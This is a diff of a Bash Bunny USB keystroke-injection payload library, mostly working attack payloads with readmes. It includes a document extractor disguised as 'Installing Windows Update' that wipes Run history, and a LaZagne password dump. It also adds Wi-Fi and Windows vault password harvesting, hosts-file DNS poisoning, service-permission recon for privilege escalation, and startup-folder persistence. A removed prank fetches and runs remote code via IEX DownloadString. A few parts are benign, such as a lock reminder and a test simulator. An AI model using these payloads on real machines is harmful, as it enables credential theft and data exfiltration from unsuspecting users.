ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
LED FINISH

32
payloads/library/exfiltration/simple-usb-extractor/readme.md Normal file
View File

@ -0,0 +1,32 @@
# Simple USB File Extractor
---
- Author: DanTheGoodman
- Creds: thehappydinoa, sebkinne
(I snagged lots of lines from their code)
### Description
---
A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
### Dependencies
---
None :)
### Configuration (optional)
---
By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
### Status:
---
|LED|Status|
|---|---|
|Yellow single blink|Running payload|
|Solid Green|Files copied|
---
This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.

37
payloads/library/exfiltration/simple-usb-extractor/x.cmd Normal file
View File

@ -0,0 +1,37 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Set the location
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM Add more of the line below specifying the location and file type
REM The below example grabs all .pdf files from the user's documents folder
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\Desktop (
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\Downloads (
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)
@cls
@exit

3
payloads/library/exfiltration/simple-usb-extractor/z.cmd Normal file
View File

@ -0,0 +1,3 @@
@echo off
cscript %~dp0\i.vbs %~dp0\x.cmd
@exit

13
payloads/library/exfiltration/usb_exfiltrator/e.cmd
View File

@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
@exit

4
payloads/library/exfiltration/usb_exfiltrator/payload.txt
View File

@ -6,12 +6,12 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

72
payloads/library/general/BlueTeamPCAudit/1.ps1 Normal file
View File

@ -0,0 +1,72 @@
#CHANGE VARIABLES BELOW
#* Author: Sorsnce
#* Version: Version 1.0
#* Target: Windows 10
#
#Gets the current logged in username
$user = $(Get-WMIObject -class Win32_ComputerSystem | select username).username
#Varaiable you need to change for the script to work.#
######################################################
#Set the following email address you want to send the email too.
$To = "SecurityTeam@yahoo.com"
#Set to the SMTP server for your organization EXAMPLE: smtpserver = "smtp.yahoo.local"
$smtpserver = "smtp.yahoo.local"
#The following trims off the domain in front of the username
#EXAMPLE: $User = Yahoo\John.Smith --> $username = John.Smith
$username = $user.Substring(6)
#Change $username+"" to your email EXAMPLE: $email = $username+"@yahoo.com"
$email = $username+"@yahoo.com"
######################################################
#Gets drive letter for the bashbunny #
$drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'bashbunny' }).name
#Sets variable to drive plus the file location
$Test = $drive + "payloads\switch1\background.bmp"
#Sets variable to test the path to file (background.bmp)
$Switch1 = Test-Path $Test
#Finds what switch bashbunny is set too
if ($Switch1 -eq "True") {$Path = $drive + "payloads\switch1\background.bmp"}
else {$Path = $drive + "payloads\switch2\background.bmp"}
#Sets wallpaper to background.bmp
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper ( string path )
{
SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
}
}
"@
Add-Type -TypeDefinition $setwallpapersrc
[wallpaper]::SetWallpaper($path)
#This sets the subject for the email
$subject = "PC Unlocked for $user"
#This sets the BODY for the email, currently using HTML
$body=@"
<body>
Security Violation!
<p>
$user left his or hers PC Unlocked!<br/>
<p>
</p>
<p>Thanks,</p>
<p></p>
Cyber Security
<p></p>
<p>Sent from my bashbunny.</p>
</body>
"@
#This sends the email with the attributes described above
send-mailmessage -smtpserver $smtpserver -to $To -Subject $subject -from $email -body $body -BodyAsHtml

23
payloads/library/general/BlueTeamPCAudit/payload.txt Normal file
View File

@ -0,0 +1,23 @@
#!/bin/bash
#
# Title: Blue Team PC Audit
# Author: Sorsnce
# Version: 1.0
# Target: Windows
#
#The PowerShell script changes the users background to "background.bmp", this allows Blue team to remind users to lock their PCs.
#The PowerShell script also sends an email to the Security Team with information about the users PC.
#This allows the Security Team to keep a record of repeatable offenders.
#Executes 1.ps1
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
Q ENTER
LED FINISH

29
payloads/library/general/BlueTeamPCAudit/readme.md Normal file
View File

@ -0,0 +1,29 @@
# Blue Team PC Audit
* Author: Sorsnce
* Version: Version 1.0
* Target: Windows
## Description
The PowerShell script changes the users background to "background.bmp", this allows Blue team to remind users to lock their PCs.
The PowerShell script also sends an email to the Security Team with information about the users PC.
This allows the Security Team to keep a record of repeatable offenders.
## Configuration
Edit 1.ps1 to specify usernames, email addresses, and domain.
You will need to add your background iamge with the name of "background.bmp". This file will be the new background on the PC.
The script will accept other file formats as long as you change the file extension in the powershell script.
Place "background.bmp" in the same directory as your payload, and you should be ready to use the Blue Team PC Audit script.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Magenta | Setup |
| Yellow | Calling the Powershell Script |
| Green | Attack Complete |
## Discussion

13
payloads/library/general/ExecutableInstaller/payload.txt
View File

@ -4,22 +4,19 @@
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G
LED FINISH

11
payloads/library/general/Proxy_Interceptor/payload.txt
View File

@ -19,10 +19,12 @@ LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
LED SETUP
GET SWITCH_POSITION
LED ATTACK
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
@ -39,6 +41,7 @@ Q STRING cd \$absPath
Q ENTER
Q DELAY 500
LED ATTACK
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
@ -62,4 +65,4 @@ Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100
LED FINISH

60
payloads/library/general/Windows NIC Sharing/server.py
View File

@ -1,60 +0,0 @@
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
IS_RUNNING = True
abspath = os.path.abspath(__file__)
CURR_DIR = os.path.dirname(abspath)
os.chdir(CURR_DIR)
class RequestServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200, "ok")
self.send_header('Content-type', 'text/plain')
self.protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(200, "ok")
self.send_header("Content-type", "text/plain")
self.end_headers()
try:
with open(CURR_DIR + self.path, 'r+') as f:
data = f.read()
self.wfile.write(data)
except IOError:
self.send_response(404)
self.wfile.write(CURR_DIR)
return
def do_POST(self):
global IS_RUNNING
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
content_length = int(self.headers['Content-Length'])
filename = self.path[1:]
if filename == 'EOF':
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
f.write(data)
f.close()
self.end_headers()
IS_RUNNING = False
else:
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
f.write(data)
f.close()
self._set_headers()
def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
while IS_RUNNING:
httpd.handle_request()
if __name__ == '__main__':
run()

0
payloads/library/general/Windows NIC Sharing/p.ps1 → payloads/library/general/Windows_NIC_Sharing/p.ps1
View File

6
payloads/library/general/Windows NIC Sharing/payload.txt → payloads/library/general/Windows_NIC_Sharing/payload.txt
View File

@ -23,7 +23,7 @@
# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
#
#
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
@ -34,9 +34,11 @@
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs
GET SWITCH_POSITION
# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)
# HID Attack Starts
ATTACKMODE HID

0
payloads/library/general/Windows NIC Sharing/readme.md → payloads/library/general/Windows_NIC_Sharing/readme.md
View File

0
payloads/library/credentials/MrRobot/server.py → payloads/library/general/Windows_NIC_Sharing/server.py
View File

9
payloads/library/phishing/dns_poisoning_mac/README.md Normal file
View File

@ -0,0 +1,9 @@
# DNS Poisoning Attack Mac
## Description
Redirects a domain to a set IP adres by changing the hosts file.
## Configuration
Change the domain you want to redirect and the IP you want to direct it to.

23
payloads/library/phishing/dns_poisoning_mac/payload.txt Normal file
View File

@ -0,0 +1,23 @@
#Title: DNS Poisoning Mac
#Description: Attacks the host file to redirect a website of your chosing for a given domain
#Author: thehappydinoa
#Target: OS X
LED R 200
ATTACKMODE HID
LED STAGE1
Q DELAY 400
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 200
Q ENTER
Q DELAY 400
Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
Q DELAY 50
Q ENTER
Q STRING exit
Q ENTER
LED FINISH

25
payloads/library/poc/LINUX_HID/README.md Normal file
View File

@ -0,0 +1,25 @@
# Linux HID poc
Author: Thorsten Sick
Version: 0.9
OS: Linux
Attackmode: HID
IOC: gedit started, file created ('/tmp/owned')
Category: POC
## Description
Uses HID (keyboard) to start an xterm and create the file '/tmp/owned'. After that it starts gedit and writes 'Gotcha'
## Status
|LED|Status|
|-|-|
|SETUP (Magenta solid)|Not much setup needed|
|ATTACK (Yellow single blink)|attack: start xterm and gedit|
|FINISH (Green 1000ms VERYFAST blink followed by SOLID)|Done|

38
payloads/library/poc/LINUX_HID/payload.txt Normal file
View File

@ -0,0 +1,38 @@
#!/bin/bash
#
# Title: LINUX HID POC
# Description: Payload to test protection technology
# Original Author: Thorsten Sick
# Version: 0.9
# Category: POC
# Target: Linux
# Attackmodes: HID
#
#
# To test detection technolgy a malware-simulator is needed.
# Criteria:
# - one trick pony - no side effects
# - simple to test with (ui and file system markers left)
# - non-destructive/invasive
# "This is the eicar for bash bunny"
#init
LED SETUP
ATTACKMODE HID
# attack
LED ATTACK
RUN UNITY xterm
Q DELAY 1000
Q STRING touch /tmp/owned
Q ENTER
Q STRING exit
Q ENTER
RUN UNITY gedit
Q DELAY 1000
Q STRING Gotcha
# finish
LED FINISH

12
payloads/library/poc/README.md Normal file
View File

@ -0,0 +1,12 @@
# Proof of concepts and malware simulators
The payloads contained in here are to test protection technology.
"The Eicar of BashBunny attacks"
Criteria:
- one trick pony, as simple as possible
- the essence of one attack
- no side effects
- simple to test with (ui and file system markers left by attack)
- non-destructive/invasive

124
payloads/library/prank/RickRoll/RR.ps1
View File

File diff suppressed because one or more lines are too long

BIN
payloads/library/prank/RickRoll/background.mp3
View File

Binary file not shown.

34
payloads/library/prank/RickRoll/payload.txt
View File

@ -1,34 +0,0 @@
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED B 200
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit

24
payloads/library/prank/RickRoll/readme.md
View File

@ -1,24 +0,0 @@
# RickRoll Prank
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started starting the rickroll |
| Green | RickRoll Started, Safe to pull |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40579-payload-rickroll-prank/ "Hak5 Forum Thread")

30
payloads/library/prank/Startup-Message/payload.txt Normal file
View File

@ -0,0 +1,30 @@
#!/bin/bash
#Title: Startup-Message
#Author: By MikeeU
#Target: Windows
#Tested on: Windows 10
#Version: 1.0
#Setting up(Magenta)
LED SETUP
ATTACKMODE HID
#Beginning HID Attack(Yellow)
LED ATTACK
#Running cmd to create file in startup directory
RUN WIN cmd
Q STRING "cd C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Q ENTER
Q STRING "echo @echo off > startup.bat"
Q ENTER
Q STRING "echo echo I will lock my PC next time! >> startup.bat"
Q ENTER
Q STRING "echo pause >> startup.bat"
Q ENTER
Q ALT F4
#Fast green followed by Solid -> Finished
LED FINISH

22
payloads/library/prank/Startup-Message/readme.md Normal file
View File

@ -0,0 +1,22 @@
# Startup-Message
by KMikeeU
* Target: Windows
* Tested on: Windows 10
* Should work on: Windows XP, Vista, 7, 8(Desktop), 10
* Version: 1.0
## Description
This little __HID__ Attack, will use cmd to create a file in the startup directory of the logged in user on the target PC. Which will display a message set by the attacker on logging in.
## Configuration
You can edit the script to change the name of the file and the text that will be displayed.
Defaults: startup.bat; I will lock my PC next time!
## Status
| Status | Color | Description |
|------|------|------|
|SETUP|Magenta|Setting Attack mode|
|ATTACK|Slow Yellow|Injecting keystrokes|
|FINISH|Fast Green followed by solid|Payload has finished!|

23
payloads/library/prank/lockpc/README.md Normal file
View File

@ -0,0 +1,23 @@
## Lock PC Prank
* Author: Frater V:I:
* Version: Version 1.0
* Target: Linux, Windows, OSX
## Description
A variation of the Notepad fun payload written by The10FpsGuy and Mrhut10
## Configuration
None
## Status
LED SETUP - detecting OS using get.sh extension
LED ATTACK - launching the payload based on OS detected
LED FAIL3 - No OS detected
LED FINISH - system should be locked and payload is done
## Discussion

75
payloads/library/prank/lockpc/payload.txt Normal file
View File

@ -0,0 +1,75 @@
#
#
# Title: PC Lock Fun
# Original Authors: The10FpsGuy and Mrhut10
# Big thanks to Mrhut10 for helping to put a loop in it :D
# Modified: FraterVI
# Category: Fun
# Target:.           Windows, Linux, Mac
# Description: Takes original prank payload and adds OS detection so
# it can be run on any(mostly any) OS.
#
#options
LED SETUP
TARGET_OS="UNKNOWN"
ATTACKMODE RNDIS_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
echo "No Target IP" > /dev/null
ATTACKMODE ECM_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
LED FAIL3
exit 1
fi
fi
GET TARGET_OS
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=50
msg_end="Please remember to lock your computer when you walk away."
LED ATTACK
Q DELAY 500
case "$TARGET_OS" in
"LINUX") ATTACKMODE HID
RUN UNITY gedit
;;
"MACOS") ATTACKMODE HID VID_0x05AC PID_0x021E
RUN OSX terminal
;;
"WINDOWS") ATTACKMODE HID
RUN WIN notepad.exe
;;
"UNKNOWN") LED FAIL3
exit 1
;;
esac
Q DELAY 1000
Q STRING $msg_header
Q ENTER
for (( i=1; i<=$msg_body_repeats; i++ ))
do
Q STRING $msg_body
Q ENTER
done
Q STRING $msg_end
Q ENTER
case "$TARGET_OS" in
"LINUX") Q GUI l
;;
"MACOS") Q STRING "/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
Q ENTER
;;
"WINDOWS") Q GUI l
;;
"UNKNOWN") LED FAIL3
exit 1
;;
esac
LED FINISH

13
payloads/library/prank/macDesktop/macWallpaper.sh
View File

@ -1,25 +1,26 @@
pid=$$
touch /tmp/$pid
cd /tmp/
for (( i=0; i < 5; ++i ))
do
if [ ! -e /tmp/1.jpg ]; then
wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg";
curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";
fi
if [ ! -e /tmp/2.jpg ]; then
wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg";
curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/";
fi
if [ ! -e /tmp/3.jpg ]; then
wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg";
curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg";
fi
if [ ! -e /tmp/4.jpg ]; then
wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg";
curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg";
fi
if [ ! -e /tmp/5.jpg ]; then
wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg";
curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png";
fi
let number="$RANDOM % 5 + 1 | bc"
@ -31,7 +32,7 @@ do
killall Dock
let time="$RANDOM % 18000 + 2700 | bc"
echo $time
sleep $time
sleep $time
done
rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid

15
payloads/library/prank/win93/payload.txt
View File

@ -13,7 +13,7 @@ LOOTDIR='/root/udisk/loot/win93'
# Script section, do not modify after that line
LED SETUP
mkdir -p $LOOTDIR
echo "Starting win93 prank" > $LOOTDIR/win93.log
echo "Starting win93 prank: " > $LOOTDIR/win93.log
DEFAULT=0
LED STAGE1
@ -21,7 +21,7 @@ ATTACKMODE ECM_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
echo "No target IP, checking if it's a windows host" >> $LOOTDIR/win93.log
echo "No target IP, checking if it's a windows host: " >> $LOOTDIR/win93.log
DEFAULT_OS='WIN'
LED SPECIAL
ATTACKMODE RNDIS_ETHERNET
@ -78,15 +78,14 @@ if [ "$OS" = "MAC" ]; then
RUN OSX "terminal"
QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";"
elif [ "$OS" = "LINUX" ]; then
DUCKY_LANG fr
RUN UNITY "xterm"
QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;"
QUACK ENTER
RUN LINUX "xdg-open http://www.windows93.net"
QUACK DELAY 1000
QUACK F11
elif [ "$OS" = "WIN" ]; then
LED FAIL
echo "Payload not supported on windows for now, exiting" >> $LOOTDIR/win93.log
RUN WIN "cmd /c start http://www.windows93.net"
QUACK DELAY 1000
QUACK F11
exit 1
fi

8
payloads/library/recon/GetServicePerm/GetServicePerm.ps1 Normal file
View File

@ -0,0 +1,8 @@
$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
$file = $item.ToString($item)
icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
}

33
payloads/library/recon/GetServicePerm/payload.txt Normal file
View File

@ -0,0 +1,33 @@
#!/bin/bash
#
# Title: GetServicePerm
# Author: Resheph @ www.postexplo.com
# Version: 0.1
# Target: Microsoft Windows hosts supporting PowerShell
# Category: Recon
#
# Description:
# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
#
# init
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LOOTDIR=/root/udisk/loot/GetServicePerm
mkdir -p $LOOTDIR
# Do Recon
LED SETUP
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
Q ENTER
# Done
sync;sleep 1;sync
LED FINISH

25
payloads/library/recon/GetServicePerm/readme.md Normal file
View File

@ -0,0 +1,25 @@
# GetServicePerm
* Title: GetServicePerm
* Author: Resheph @ www.postexplo.com
* Version: 0.1
* Target: Microsoft Windows hosts supporting PowerShell
* Category: Recon
## Description
When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
This is useful when a service is executed with elevated privileges but is modifiable by everyone.
When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
## Configuration
The only thing you will need to change is the Ducky language so it matches the target.
## STATUS
LED SETUP
LED FINISH
## Discussion

40
payloads/library/recon/InfoGrabber/info.ps1
View File

@ -1,8 +1,9 @@
# Shows details of currently running PC
# Simen Kjeserud (Original creator), Gachnang
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
#Get info about pc
# Get IP / Nework Info
try
{
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
@ -21,6 +22,7 @@ $IsDHCPEnabled = $true
[string[]]$computerMAC =$Network.MACAddress
}
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
@ -47,11 +49,10 @@ if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").
$RDP = "RDP is NOT enabled"
}
# Get network interfaces
#| where { $_.ipaddress -notlike $null }
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSID and password
# Get wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
@ -82,8 +83,7 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# get listeners / ActiveTcpConnections
#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
@ -113,29 +113,7 @@ $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $nu
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
#Get installed passwords
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
for($i = 0; $i -lt $profileRows.Count; $i++){
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
if($passwordSearchResult){
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
} else {
$profilePw = ''
}
$networkObject = New-Object -TypeName psobject -Property @{
ProfileName = $profileName
SSID = $profileSSID
Password = $profilePw
}
$profileNames.Add($networkObject)
}
$profileNames.Add($networkObject)
#Get stored passwords
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
@ -180,7 +158,7 @@ $computerSystem.Name
"Network: "
"=================================================================="
"Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0]
"Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP
"RDP: " + $RDP
""
@ -210,5 +188,3 @@ $computerSystem.Name
"Windows/user passwords"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

46
payloads/library/recon/InfoGrabber/payload.txt
View File

@ -1,43 +1,21 @@
#!/bin/bash
#
# Title: Info_Grabber
# Author: Simen Kjeserud
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
# Title: Info_Grabber
# Original Author: Simen Kjeserud
# V2.0 Author: DannyK999
# Version: 2.0
# Target: Windows
# Creds: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Check swith copied from bunny_helper
check_switch() {
switch1=`cat /sys/class/gpio_sw/PA8/data`
switch2=`cat /sys/class/gpio_sw/PL4/data`
switch3=`cat /sys/class/gpio_sw/PL3/data`
if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
